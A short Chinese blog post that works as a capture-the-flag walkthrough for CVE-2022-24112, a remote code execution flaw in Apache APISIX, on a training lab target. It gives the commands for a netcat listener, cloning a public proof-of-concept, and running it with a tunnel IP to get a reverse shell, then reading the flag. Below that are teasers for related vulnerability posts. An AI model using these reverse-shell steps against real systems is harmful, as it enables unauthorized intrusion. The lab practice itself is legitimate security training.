CVE-2022-24112/POC

原创于 2023-08-13 18:11:51 发布 · 378 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全

基于春秋云镜免费空间测试

1，使用隧道代理软件将本地端口如8888映射到公网访问(自行百度这里不能说)

2，使用netcat -lvnp 8888监听本地端口

3，调用POC这里参考了文章：Apache APISIX Dashboard（CVE-2022-24112）命令执行漏洞方式利用 (qq.com)

git clone https://github.com/twseptian/cve-2022-24112 ##获取POCcd cve-2022-24112/poc/ ##进入相应目录chmod +x poc2.py ##添权限

python3 poc2.py -t eci-2zecqo925diajhkbbasa.cloudeci1.ichunqiu.com（春秋云镜打开的靶场地址，有端口加后面参数-p后面） -p 9080 -L +隧道代理的公网ip -P +隧道代理的公网ip端口

4，然后在本地监听的netcat里cat /flag即可

可以参考以下文章

春秋云境：CVE-2022-24112_Acczdy的博客-优快云博客

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Linux-K

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Apache APISIX 存在改写 X-REAL-IP header 的风险公告（CVE-2022-24112）

ApacheAPISIX的博客

02-12

5656

在 Apache APISIX 2.12.1 之前的版本中（不包含 2.12.1 和 2.10.4），启用 Apache APISIXbatch-requests 插件之后，会存在改写 X-REAL-IP header 风险。

春秋云境：CVE-2022-24112

一只爱吃橙子的羊

12-04

3948

CVE-2022-24112：Apache Apisix是美国阿帕奇（Apache）基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现，具备动态路由和插件热加载，适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞，该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制，容易导致远程代码执行。

1 条评论您还未登录，请先登录后发表或查看评论

[春秋云镜]CVE-2022-24112

niubi707的博客

12-04

6390

春秋云镜CVE-2022-24112Apache Apisix是美国阿帕奇（Apache）基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现，具备动态路由和插件热加载，适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞，该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制，容易导致远程代码执行。

春秋云镜 CVE-2022-24112

qq_22002773的博客

07-10

588

春秋云镜 CVE-2022-24112

i春秋云镜CVE-2022-24112

qq_29060627的博客

04-29

583

【代码】i春秋云镜CVE-2022-24112。

精选资源

CVE-2022-33891POC Apache Spark 命令注入（CVE-2022-33891）POC

08-10

CVE-2022-33891POC Apache Spark 命令注入（CVE-2022-33891）POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本，参考官网链接： ...

精选资源

OpenSSL拒绝服务漏洞 (CVE-2022-0778) poc证书

03-24

下载后执行 openssl x509 -in 2022_0778.pem -inform DER -text -noout 或者在自己产品证书管理界面上传证书验证参考https://github.com/drago-96/CVE-2022-0778 制作证书验证

精选资源

CVE-2022-22947-Spring-Cloud-Gateway 内存马POC

03-29

Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告，据公告描述，当启用和暴露 Gateway Actuator 端点时，使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求，从而...

精选资源

CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁

最新发布

01-19

针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 ：在管理接口上执行经过身份验证的（低特权）远程代码 CVE-2023-6549：拒绝服务 2、强烈建议受影响...

Juniper Product

09-12

Juniper Product

[POC分享] CVE: 2022-24112：Apache APISIX 2.12.1 - Remote Code Execution (RCE)

「鸿渐之翼」的博客

04-22

1018

攻击者可以滥用批处理请求插件发送请求以绕过 Admin API 的 IP 限制。Apache APISIX 的默认配置（使用默认 API 密钥）容易受到远程代码执行的影响。更改 admin key 或 Admin API 的端口更改为与数据面板不同的端口时，影响较小。但是绕过Apache APISIX的数据面板的IP限制还是有风险的。批处理请求插件中有一个检查，它用其真实的远程 IP 覆盖客户端 IP。但是由于代码中的错误，可以绕过此检查。

CVE-2022-24112 Apache APISIX 命令执行漏洞复现

Love&Share

04-07

6203

如果用户使用 Apache APISIX 默认配置（启用 Admin API ，使用默认 Admin Key 且没有额外分配管理端口），攻击者可以通过 batch-requests 插件调用 Admin API ，导致远程代码执行。Apache APISIX 是 Apache 软件基金会下的云原生 API 网关，它兼具动态、实时、高性能等特点，提供了负载均衡、动态上游、灰度发布（金丝雀发布）、服务熔断、身份认证、可观测性等丰富的流量管理功能。登陆后台可以看到其添加的一条路由列表，在。

CVE-2022-24112 Apache APISIX 远程代码执行漏洞

m0_71745258的博客

01-29

1712

如图片过大被平台压缩导致看不清的话，需要的话可以扫码，优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享视频配套资料&国内外网安书籍、文档&工具当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。需要的话可以扫码，优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享。

漏洞复现-CVE-2022-24112 APISIX远程代码执行漏洞原理与复现

关注网络安全、云原生安全

07-15

3568

由于代码逻辑问题，没有覆盖为真实ip，导致绕过了请求限制，且发送请求有默认的key，通过发送请求注册路由，并使用batch-requests插件执行了命令。

Apache APISIX Dashboard（CVE-2022-24112）命令执行漏洞方式利用

include_voidmain的博客

04-11

8322

0x01 什么是Apache APISIX Dashboard Apache APISIX 是一个动态、实时、高性能的开源 API 网关，提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX 可以帮助企业快速、安全地处理 API 和微服务流量，包括网关、Kubernetes Ingress 和服务网格等。 0x02 漏洞详情漏洞编号：CVE-2022-24112 影响版本：Apache APISIX < 2.12.1 Apache APIS

Apache APISIX 存在改写 X-REAL-IP header（CVE-2022-24112）

李同學的安全圈

02-28

1366

一、风险概述在 Apache APISIX 2.12.1 之前的版本中（不包含 2.12.1 和 2.10.4），启用 Apache APISIX batch-requests 插件之后，会存在改写 X-REAL-IP header 风险。该风险会导致以下两个问题：攻击者通过 batch-requests 插件绕过 Apache APISIX 数据面的 IP 限制。如绕过 IP 黑白名单限制。如果用户使用 Apache APISIX 默认配置（启用 Admin API ，使用默认 Admin

ImageMagick任意文件读取漏洞(CVE-2022-44268)

god_Zeo的安全博客

02-12

4848

爆出一个 ImageMagick 漏洞 CVE-2022-44268 ，在ImageMagick 7.1.0-51版本及以前 ,可以造成一个任意文件读取的危害比较可观，最近有时间来复现学习一下

CVE-2022-24112

08-30

CVE-2022-24112是一个Apache APISIX的漏洞，详情可以在GitHub上找到详细信息。根据提供的引用，我们可以看到此漏洞的POC在GitHub上的twseptian的仓库中。<span class="em">1</span><span class="em">2</span>...